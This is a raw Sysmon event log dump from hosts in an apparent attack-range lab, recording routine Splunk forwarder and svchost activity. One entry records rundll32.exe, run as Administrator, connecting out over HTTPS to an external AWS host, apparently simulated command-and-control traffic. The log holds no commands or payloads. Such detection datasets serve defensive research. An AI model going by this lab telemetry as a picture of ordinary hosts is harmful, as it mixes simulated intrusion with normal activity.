12:22:13.082{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439880Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:13.082{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000291197Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:10.368{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50599-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291200Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:14.865{BEA10069-D0C2-6086-1300-00000000BB01}344NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=772EB2A39220957909FB900A73D99CA0,SHA256=CDA012ABBA2F63506751852AD1B0CD25C5BB18FDE27227358BEC27A0C56EEB6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291199Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:14.495{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=216BD6F392BF41ED8AC925420D20A35B,SHA256=D9416267604CF8C93950EA66460EE90896F31C502D4FC3D6FB4AA35541D4ACC8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439890Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:14.083{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439889Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:14.083{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439888Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:14.064{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA49B9C953B087481FA77727D51AD200,SHA256=33FBC76E43F84A2F002B9FFD523EADE4ACAFE5E31D81B3983A2E2D4748AF0C8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291201Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:15.497{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18F3DB80421951822BCBCAFC20EAFA90,SHA256=B2FCB67B81205764169F2DEDFA5A02E371EEFF42F2AB6519826F28602E4C6EEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439893Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:15.118{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC2A11A88958D2C33BB2FA880111D843,SHA256=4223ABDA619F57B35364F6636DEEDB4047DD42A2323B073DC95E06B12BA5C711,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439892Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:15.084{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439891Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:15.084{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000439898Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:13.543{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62380-false10.0.1.12-8000- 23542300x8000000000000000439897Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:16.124{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5FA1B51E0A31CEBFDAB2AF5331D339D,SHA256=726231BE63EACDC841A9C2660A5D2CA650A0AC22EBA34EC59EC8A556CC613038,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291202Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:16.534{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36BC9FB2E5A8C00DB40F3333281D56C9,SHA256=DF40F220AD992E22FB6EBFEAA93CF042781E4AF4CD3C8DDF1E6A2C05EEE5CABC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439896Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:16.099{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6DB235E4ECB2762AF5CD751992059EA4,SHA256=55213C2A6D5BF12D718027B2760BBE6BB0FF7FD82986A5211B671DCF12FD2845,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439895Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:16.085{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439894Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:16.085{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439901Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:17.339{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C62B8D0235C413907FB000F85C16D7D8,SHA256=0B2BF4A697A0BF7F6FF28651712EAEC0084531F46CED36660C657480FAC8E0FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291205Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:17.555{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80721E04C3AE33A2B22CC25817EA2CCE,SHA256=A059AC130865FD1F595767DA2EB2E08E1C1DAA1F1CA85910CCA6CA7EE37F337E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439900Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:17.086{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439899Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:17.086{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291204Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:17.101{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAEEC95CBC2C656E5441FCFDA23C1BFB,SHA256=9705662FD5E23948E212F66D0AE0C4D56D5FA672CDF9B30DF8ECF46969676DE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291203Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:17.101{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=653C61E8A2B11A410EBCA2E42BE07092,SHA256=C068BF049EB926D5A44A277D1280F104729407FA40A328F753520669FE563A90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291207Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:18.557{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C041D41DB295EA53A8D2F5A6A084CD8B,SHA256=EB8D1ABF5CF2671747DD3EC39257A17E365E3C919FE807F57308E20DBAB3CC3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439904Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:18.342{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27FB58934AF5A967C805CA832AB31D76,SHA256=7BAD45ED83C3DDBDF2FDFC3660F5CBE046309D4F1059B69DEF80FDC28B46BEE0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439903Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:18.087{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439902Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:18.087{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000291206Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:15.380{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50600-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291208Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:19.560{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7106575C3AC45511A82A9A658C8EBC49,SHA256=AC6BAE967E69A4C5FD3C0DF7BB5BD4BD63B763F5E0A6C9477B429E90FF0A68C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439907Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:19.349{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87003C277A2AAA4FB78B7855DA624AA1,SHA256=BD4CDEBC3849B2F9578B9367E186E48950AD23DE5A09C990DC7DEFE2826A4FF0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439906Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:19.088{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439905Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:19.088{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291210Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:20.577{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=471981FFAB6F33F786A998E157919A12,SHA256=F42A88B2DBCC7DE6176C3A4F0BC3B616AE47EE6CF37FE6048DD5226D986B1C78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439910Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:20.355{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=519B53529F5AAADB985723DA5F8F2F36,SHA256=7C5626D9AD278922638E17042C62163F04AB00E998D14C9F6AF91D0C044138B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291209Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:20.442{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAEEC95CBC2C656E5441FCFDA23C1BFB,SHA256=9705662FD5E23948E212F66D0AE0C4D56D5FA672CDF9B30DF8ECF46969676DE7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439909Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:20.089{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439908Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:20.089{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439927Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:21.945{42DC5269-CF3C-6086-AA00-00000000BA01}4168NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=1385DDF0A626EB1FF1FAEF0A6E1E1E19,SHA256=D3A04D6A86810FFAE54532D83A4C2D8246C33C9E5E1AB8193B89366C377D56F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439926Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:18.667{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62381-false10.0.1.12-8000- 23542300x8000000000000000439925Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:21.510{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C33ACB37053BBD99DE1D48D5A51B12DA,SHA256=768F7D3260CB74C6E80F385CD4F478AC6AABBB0AA2FBAEA3409AEF84767742B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291212Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:21.580{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8315C7FDDA6D8B5E54CE829C18627201,SHA256=F5A712F3C7FB18F52B9F6F031FC821898721C5174D78961B066F635B5C5DE69B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291211Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:18.734{BEA10069-187E-6087-4F0E-00000000BB01}3388C:\Windows\SysWOW64\rundll32.exeWIN-HOST-96\Administratortcptruefalse10.0.1.15win-host-96.attackrange.local50601-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x8000000000000000439924Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:21.429{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DCE18404126727D0D7A1B6B434C1D15,SHA256=3CD671CE961C5522B15E171C85C65AC4F3CB259E5187CD7FED1F9240B27DF601,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439923Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 